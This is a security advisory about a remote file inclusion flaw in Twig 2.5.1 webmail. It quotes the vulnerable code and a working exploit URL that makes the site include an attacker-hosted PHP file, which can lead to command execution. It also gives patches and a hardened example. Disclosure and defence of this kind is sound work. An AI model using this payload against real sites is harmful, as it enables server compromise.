COMMAND

    Twig

SYSTEMS AFFECTED

    Twig 2.5.1

PROBLEM

    Joao Gouveia aka Tharbad found the following.  Twig is a popular
    webmail system written in PHP, once called Muppet.  The possibility
    of having it process our own PHP file can lead to arbitrary command
    execution on the server as the httpd user.

    Twig is designed to allow virtual hosting; unfortunately the script
    that handles this fails to check for user-supplied input, thus
    allowing anyone to submit malicious values as the configuration
    directory.  The faulty piece of code (in index.php3) is:

        // Allow for virtual hosting
        $config_dir = "config";
        if( $vhosts[$SERVER_NAME] )
        {
            $config_dir = $vhosts[$SERVER_NAME];
            include( $config_dir . "/config.inc.php3" );
            include( $config_dir . "/images.inc.php3" );
        }

    If the vhosts "directive" is not initialized, it is trivial to
    exploit.  Let's look at an example:

    1. We create a config.inc.php3 script with " <? phpinfo(); ?> " in
       it, and upload it to some free web hosting service machine.
    2. We go to the vulnerable site using Twig and type in the browser:

        http://twig.vuln.site/index.php3?vhosts[twig.vuln.site]=http://free.host.machine/~mydir/

    3. The script gladly includes _my_ config.inc.php3 and executes it,
       presenting me with the phpinfo output of the vulnerable site.

    You can surely imagine the danger: for example, if the vulnerable
    site has safe_mode disabled, we could simply use system($string) to
    execute arbitrary commands as the httpd user.

    Even if safe mode is enabled, it is still possible to execute our
    code for things like revealing the source of PHP files, which may
    contain sensitive data.

    Note: this only works if our free web host does not itself process
    the php3 file, i.e. it must serve the file as plain text so that the
    vulnerable site receives the PHP source rather than its output.

SOLUTION

    The author(s) were warned on 2000-11-13; the fix will be included in
    the next version.  As a short-term fix, try the following.  Simply
    add:

        unset($config);
        unset($vhosts);

    at the top of config/config.inc.php.

    Also add:

        unset($dbconfig);

    at the top of config/dbconfig.inc.php3 for good measure.
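
    A more thorough fix is to never let the request decide where the
    configuration comes from.  The following is an added example, not
    Twig's own code: it replaces the virtual hosting block above with a
    vhost map defined in the script itself, rejects anything that is not
    a plain directory name, and confirms the resolved path stays under
    the config base.  Host names and directory names are constructed
    samples; it assumes PHP 4.1 or later for $_SERVER.

```php
<?php
// Added example (not Twig's code): hardened virtual hosting lookup.
// Authoritative map of host name -> config subdirectory. Because it is
// assigned here, a request parameter such as vhosts[...] can no longer
// populate it, even with register_globals enabled.
$vhosts = array(
    'mail.example.org' => 'example_org',   // constructed sample entries
    'mail.example.net' => 'example_net',
);

$base_dir   = dirname(__FILE__) . '/config';
$config_dir = $base_dir;

// Take the host name from the server environment, never from a
// user-controlled variable.
$host = isset($_SERVER['SERVER_NAME']) ? $_SERVER['SERVER_NAME'] : '';

if (isset($vhosts[$host])) {
    $sub = $vhosts[$host];
    // Defence in depth: only a bare directory name is acceptable, so a
    // stream wrapper (http://) or traversal (../) can never reach include().
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $sub)) {
        exit('invalid vhost configuration');
    }
    $config_dir = $base_dir . '/' . $sub;
}

// Resolve symlinks and verify the final directory is inside $base_dir.
$real_base = realpath($base_dir);
$real_dir  = realpath($config_dir);
if ($real_base === false || $real_dir === false
    || strpos($real_dir, $real_base) !== 0) {
    exit('configuration directory outside of ' . $base_dir);
}

include($real_dir . '/config.inc.php3');
include($real_dir . '/images.inc.php3');
?>
```

    Independently of the script, disabling URL fopen wrappers in the PHP
    build (or, on later PHP versions, setting allow_url_fopen = Off in
    php.ini) removes the remote include vector for every script on the
    host.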

    Please note that this vulnerability is only exploitable if the URL
    fopen wrappers functionality is compiled in (it is by default) and
    the script is not being run on the Windows platform (Windows does
    not support remote files in include() statements).